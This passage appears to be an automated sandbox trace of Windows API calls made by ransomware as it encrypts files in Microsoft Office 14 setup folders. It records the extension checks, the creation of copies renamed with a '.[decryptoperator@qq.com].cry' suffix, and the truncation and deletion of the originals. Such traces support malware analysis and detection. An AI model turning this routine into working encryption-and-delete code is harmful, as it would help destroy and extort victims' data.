-1 [0040.117] lstrlenW (lpString=".ppt") returned 4 [0040.117] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.117] lstrlenW (lpString=".zip") returned 4 [0040.117] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.117] lstrlenW (lpString=".rar") returned 4 [0040.117] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".bz2") returned 4 [0040.117] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".7z") returned 3 [0040.117] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.117] lstrlenW (lpString=".dbf") returned 4 [0040.117] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.117] lstrlenW (lpString=".1cd") returned 4 [0040.117] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.117] lstrlenW (lpString=".jpg") returned 4 [0040.117] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.117] lstrlenW (lpString=".doc") returned 4 [0040.117] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString=".docx") returned 5 [0040.118] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.118] lstrlenW (lpString=".pdf") returned 4 [0040.118] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString=".xls") returned 4 [0040.118] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString=".xlsx") returned 5 [0040.118] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.118] lstrlenW (lpString=".ppt") returned 4 [0040.118] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.118] lstrlenW (lpString=".zip") returned 4 [0040.118] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.118] lstrlenW (lpString=".rar") returned 4 [0040.118] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString=".bz2") returned 4 [0040.118] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString=".7z") returned 3 [0040.118] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.118] lstrlenW (lpString=".dbf") returned 4 [0040.118] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.118] lstrlenW (lpString=".1cd") returned 4 [0040.118] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.118] lstrlenW (lpString=".jpg") returned 4 [0040.118] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.119] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.119] lstrlenW (lpString="SETUP.XML") returned 9 [0040.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.119] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1452) returned 1 [0040.119] CloseHandle (hObject=0x184) returned 1 [0040.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 0x20 [0040.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.120] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.120] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0040.120] GetLastError () returned 0x0 [0040.120] ReadFile (in: hFile=0x184, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0040.138] WriteFile (in: hFile=0x1ac, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.138] ReadFile (in: hFile=0x184, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.138] WriteFile (in: hFile=0x1ac, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.139] SetEndOfFile (hFile=0x1ac) returned 1 [0040.139] CloseHandle (hObject=0x1ac) returned 1 [0040.139] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.139] SetEndOfFile (hFile=0x184) returned 1 [0040.140] CloseHandle (hObject=0x184) returned 1 [0040.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.140] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 1 [0040.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.140] lstrlenW (lpString=".doc") returned 4 [0040.140] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.140] lstrlenW (lpString=".docx") returned 5 [0040.140] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.140] lstrlenW (lpString=".pdf") returned 4 [0040.141] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString=".xls") returned 4 [0040.141] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString=".xlsx") returned 5 [0040.141] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.141] lstrlenW (lpString=".ppt") returned 4 [0040.141] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.141] lstrlenW (lpString=".zip") returned 4 [0040.141] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.141] lstrlenW (lpString=".rar") returned 4 [0040.141] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString=".bz2") returned 4 [0040.141] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString=".7z") returned 3 [0040.141] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.141] lstrlenW (lpString=".dbf") returned 4 [0040.141] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.141] lstrlenW (lpString=".1cd") returned 4 [0040.141] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.141] lstrlenW (lpString=".jpg") returned 4 [0040.141] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.141] lstrlenW (lpString=".doc") returned 4 [0040.141] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString=".docx") returned 5 [0040.141] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.141] lstrlenW (lpString=".pdf") returned 4 [0040.141] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.141] lstrlenW (lpString=".xls") returned 4 [0040.141] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.142] lstrlenW (lpString=".xlsx") returned 5 [0040.142] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.142] lstrlenW (lpString=".ppt") returned 4 [0040.142] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.142] lstrlenW (lpString=".zip") returned 4 [0040.142] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.142] lstrlenW (lpString=".rar") returned 4 [0040.142] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.142] lstrlenW (lpString=".bz2") returned 4 [0040.142] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.142] lstrlenW (lpString=".7z") returned 3 [0040.142] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.142] lstrlenW (lpString=".dbf") returned 4 [0040.142] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.142] lstrlenW (lpString=".1cd") returned 4 [0040.142] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.142] lstrlenW (lpString=".jpg") returned 4 [0040.142] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.142] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.142] lstrlenW (lpString="BRANDING.XML") returned 12 [0040.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.145] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=596341) returned 1 [0040.145] CloseHandle (hObject=0x184) returned 1 [0040.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 0x20 [0040.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.145] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.145] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0040.146] GetLastError () returned 0x0 [0040.146] ReadFile (in: hFile=0x184, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x91975, lpOverlapped=0x0) returned 1 [0040.172] WriteFile (in: hFile=0x1ac, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0040.355] ReadFile (in: hFile=0x184, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.355] WriteFile (in: hFile=0x1ac, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.355] SetEndOfFile (hFile=0x1ac) returned 1 [0040.355] CloseHandle (hObject=0x1ac) returned 1 [0040.366] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.366] SetEndOfFile (hFile=0x184) returned 1 [0040.371] CloseHandle (hObject=0x184) returned 1 [0040.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.371] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 1 [0040.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.371] lstrlenW (lpString=".doc") returned 4 [0040.371] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.371] lstrlenW (lpString=".docx") returned 5 [0040.371] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0040.371] lstrlenW (lpString=".pdf") returned 4 [0040.371] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.371] lstrlenW (lpString=".xls") returned 4 [0040.371] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.371] lstrlenW (lpString=".xlsx") returned 5 [0040.371] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0040.371] lstrlenW (lpString=".ppt") returned 4 [0040.371] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.372] lstrlenW (lpString=".zip") returned 4 [0040.372] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.372] lstrlenW (lpString=".rar") returned 4 [0040.372] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString=".bz2") returned 4 [0040.372] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString=".7z") returned 3 [0040.372] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.372] lstrlenW (lpString=".dbf") returned 4 [0040.372] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.372] lstrlenW (lpString=".1cd") returned 4 [0040.372] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.372] lstrlenW (lpString=".jpg") returned 4 [0040.372] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.372] lstrlenW (lpString=".doc") returned 4 [0040.372] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString=".docx") returned 5 [0040.372] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0040.372] lstrlenW (lpString=".pdf") returned 4 [0040.372] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString=".xls") returned 4 [0040.372] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString=".xlsx") returned 5 [0040.372] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0040.372] lstrlenW (lpString=".ppt") returned 4 [0040.372] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.372] lstrlenW (lpString=".zip") returned 4 [0040.372] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.372] lstrlenW (lpString=".rar") returned 4 [0040.372] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.372] lstrlenW (lpString=".bz2") returned 4 [0040.373] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.373] lstrlenW (lpString=".7z") returned 3 [0040.373] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.373] lstrlenW (lpString=".dbf") returned 4 [0040.373] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.373] lstrlenW (lpString=".1cd") returned 4 [0040.373] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.373] lstrlenW (lpString=".jpg") returned 4 [0040.373] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.373] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.373] lstrlenW (lpString="SETUP.XML") returned 9 [0040.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0040.729] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1988) returned 1 [0040.729] CloseHandle (hObject=0x1c0) returned 1 [0040.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 0x20 [0040.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0040.730] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.730] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0040.730] GetLastError () returned 0x0 [0040.730] ReadFile (in: hFile=0x1c0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x7c4, lpOverlapped=0x0) returned 1 [0040.855] WriteFile (in: hFile=0x1c8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0040.856] ReadFile (in: hFile=0x1c0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.856] WriteFile (in: hFile=0x1c8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.856] SetEndOfFile (hFile=0x1c8) returned 1 [0040.856] CloseHandle (hObject=0x1c8) returned 1 [0040.857] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.857] SetEndOfFile (hFile=0x1c0) returned 1 [0040.858] CloseHandle (hObject=0x1c0) returned 1 [0040.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.858] DeleteFileW 